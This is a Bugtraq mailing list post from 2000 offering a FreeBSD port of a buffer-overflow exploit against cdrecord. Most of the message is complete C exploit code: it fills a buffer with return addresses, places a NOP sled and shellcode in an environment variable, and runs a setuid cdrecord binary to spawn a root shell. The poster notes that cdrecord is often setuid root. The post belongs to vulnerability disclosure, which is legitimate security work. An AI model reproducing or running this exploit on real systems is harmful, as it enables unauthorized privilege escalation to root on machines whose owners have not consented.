Bugtraq mailing list archives
Re: Mandrake 7.0: /usr/bin/cdrecord gid=80 (strike #2)
From: sectorx () DIGITALPHOBIA COM (sector x)
Date: Sat, 10 Jun 2000 16:36:13 -0000
Here is a freebsd port of noir's cdrecord buffer overflow. have you noticed cdrecord is very often suid root on many systems?:) --sectorx -- snip snip -- /* freebsd cdrecord exploit port by sectorx of XOR (http://xorteam.cjb.net) */ #include <stdio.h> #include <stdlib.h> #define LENGTH 76 #define EGGIE 500 long esp() { __asm__("movl %esp, %eax"); } char devilspawn[]; int main(int argc, char *argv[]) { long addr; char buf[LENGTH]; char egg[EGGIE]; int i,offset; printf("cdrecord exploit by sectorx (FreeBSD)\n"); if (argc < 2) { printf("error: offset must be supplied as a parameter\n"); printf("*note* FreeBSD 3.3-RELEASE\'s offset is 600\n\n"); return; } offset = atoi(argv[1]); addr = esp()+offset; printf("Using offset 0x%x [%d], eip = 0x%x\n",offset,offset,addr); /* build the overflow string */ for (i=0;i<LENGTH;i+=4) *(long*)&buf[i] = addr; buf[LENGTH-1] = '\0'; /* build the egg string */ memset(&egg,0x90,sizeof(egg)); memcpy(egg+(EGGIE-strlen(devilspawn)-1),devilspawn,strlen(devilspawn)); egg[EGGIE-1] = '\0'; setenv("EGG",egg,1); execl("/usr/local/bin/cdrecord","cdrecord-bin","dev=",buf,"/etc/fstab",0); } /* FreeBSD shellcode by mudge of L0pht */ char devilspawn[]= "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
Current thread:
- Re: Mandrake 7.0: /usr/bin/cdrecord gid=80 (strike #2) Jeff Garzik (May 31)
- Re: Mandrake 7.0: /usr/bin/cdrecord gid=80 (strike #2) noir (May 30)
- <Possible follow-ups>
- Re: Mandrake 7.0: /usr/bin/cdrecord gid=80 (strike #2) sector x (Jun 10)
- Re: Mandrake 7.0: /usr/bin/cdrecord gid=80 (strike #2) Alfred Perlstein (Jun 10)